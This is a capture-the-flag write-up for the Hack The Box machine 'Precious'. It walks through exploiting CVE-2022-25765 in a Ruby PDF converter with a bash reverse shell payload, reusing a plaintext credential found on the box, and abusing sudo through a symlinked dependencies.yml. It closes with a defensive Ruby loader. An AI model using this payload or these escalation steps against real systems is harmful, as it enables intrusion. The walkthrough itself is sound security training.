Engagement flow
Summary
This machine starts off with some basic web enumeration. The user learns about a web-page-to-PDF conversion application. Some research reveals that this application is written in Ruby and has known CVEs for the version in use. Exploiting the web application provides our initial foothold as a user on the host via a reverse shell.
From here we locate credentials in the user's home folder which allow for horizontal movement and access as a privileged user. For the root phase of this engagement, we learn about a sudo run-as permission that leads to a vulnerability from misconfigured permissions in a custom workflow that reads a .yml file as root. We are able to create a malicious .yml file to execute code under the automated workflow running as root.
Tools used
Whatweb
linpeas
Processes/Techniques
Web enumeration
Command injection
Insecure file hijacking
sudo run-as permission abuse
.yml file creation
Enumeration
We have a narrow attack surface as only 2 ports are open. Typically port 22 (SSH) is reserved for our connections back into the machine within the Hack The Box context. Port 80, however, is likely where we will achieve our initial foothold through a CVE or a misconfiguration of some sort.
Running a more in-depth nmap scan reveals that port 80 is running nginx 1.18.0 with the http-title "Convert Web Page to PDF".
Taking our web enumeration further, we utilize the tool whatweb to gather further information about our web service. We learn that Ruby on Rails is in use for the development of this web application. We also see the header X-Powered-By[Phusion Passenger]. Researching this reveals it is a web application server with support for Python, Node.js and Ruby on Rails, designed to integrate into Nginx or Apache.
Precious.HTB web application stack
NGINX Server - Web Server
Phusion Passenger - Web Application Server
Ruby on Rails - Web Application Framework
Convert Web Page to PDF - Web application Purpose
Browsing to the website we are presented with a very basic application. Some research, however, suggests we have a Ruby PDF kit with known CVEs.
CVE-2022-25765
Reverse shell for initial foothold
Initially I tried the POC provided in the article above, linked back to snyk.io. I was unsure if the default POC was actually working or not, but it certainly was not obvious if it was not working.
Default POC payload
http://example.com/?name=#{'%20`sleep 5`'}
Modified Payload
The difference here is the insertion of a reverse shell, with the addition of double quotes to allow for the initial call to the terminal.
http://example.com/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.15.64/6363 0>&1"`'}
We can see a successful connection in the screenshot below.
User Phase
In this phase we start looking for anything out of the ordinary. We attempted to leverage linpeas, which resulted in making no progress. Some manual investigation, and a hint later, I found the .bundle hidden directory in the ruby folder. This is a folder not normally seen on Linux, and such a deviation had not originally crossed my mind without asking for help. Drilling down into the folder, we find credentials in the config folder and these allow for a successful SSH connection.
henry:Q3c1AqGHtoI0aXAYFH
With these credentials we are able to obtain a successful shell as user Henry on the target system.
Root
For the root phase we noticed that there is a run-as permission set in place. The run-as permission is attached to the /opt/update_dependencies.rb file.
We see that dependencies.yml is in use. Below are our optional workflows. We can do this manually, or simply create a symbolic link.
Henry can run /opt/update_dependencies.rb
update_dependencies calls file.read looking for dependencies.yml
Confirm path hijacking
Craft malicious dependencies.yml
Call malicious dependencies.yml with sudo
OR
The approach that seemed more likely to be exploitable. This then outputs the string in the root flag as part of a standard error message.
Set a symbolic link to the flag via pointer attached to dependencies.yml
/opt/update_dependencies.rb ---> dependencies.yml --> /root/root.txt
Sudo call
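As an added defensive illustration (not code from the box or from this writeup), this is how a script run under sudo could read a dependencies.yml without being hijackable: it refuses relative paths and symlinks, checks ownership and mode on the opened file, and parses with safe_load instead of the object-instantiating loader. The function names, the ownership policy and the sample file contents are assumptions.

```ruby
require 'yaml'
require 'tmpdir'

# Hypothetical hardened loader for a dependencies.yml that a script run under
# sudo would read. It closes the two weaknesses described above: trusting a
# path the unprivileged caller controls (file/symlink hijacking) and parsing
# that file with the object-instantiating YAML loader.
class DependencyFileError < StandardError; end
# Returns {gem_name => version} or raises DependencyFileError.
def load_dependencies(path, expected_owner_uid: 0)
  raise DependencyFileError, "#{path}: must be an absolute path" unless path.start_with?('/')
  # O_NOFOLLOW makes the kernel refuse a symlink at the final path component, so
  # the ownership/mode checks and the read happen on the same inode (no race).
  File.open(path, File::RDONLY | File::NOFOLLOW) do |f|
    st = f.stat
    raise DependencyFileError, "#{path}: not a regular file" unless st.file?
    unless st.uid == expected_owner_uid
      raise DependencyFileError, "#{path}: owned by uid #{st.uid}, expected #{expected_owner_uid}"
    end
    raise DependencyFileError, "#{path}: writable by group or others" unless (st.mode & 0o022).zero?
    # safe_load rejects tags such as !ruby/object that would instantiate arbitrary classes.
    data = YAML.safe_load(f.read, permitted_classes: [], aliases: false)
    valid = data.is_a?(Hash) && data.all? { |k, v| k.is_a?(String) && v.is_a?(String) }
    raise DependencyFileError, "#{path}: expected a mapping of name => version" unless valid
    data
  end
rescue Errno::ELOOP, Errno::ENOENT => e
  raise DependencyFileError, "#{path}: #{e.class}"
rescue Psych::Exception => e
  raise DependencyFileError, "#{path}: rejected YAML (#{e.message})"
end

# Pass/fail wrapper for callers that only need to know whether the file is acceptable.
def dependencies_ok?(path, expected_owner_uid: 0)
  load_dependencies(path, expected_owner_uid: expected_owner_uid)
  true
rescue DependencyFileError
  false
end

if __FILE__ == $0
  Dir.mktmpdir do |dir|
    good = File.join(dir, 'dependencies.yml')   # constructed sample file
    File.write(good, "examplegem: '1.2.3'\n")
    File.chmod(0o644, good)
    p load_dependencies(good, expected_owner_uid: Process.uid)  # prints the parsed mapping
    File.symlink(good, File.join(dir, 'link.yml'))
    p dependencies_ok?(File.join(dir, 'link.yml'), expected_owner_uid: Process.uid)  # symlink refused
  end
end
```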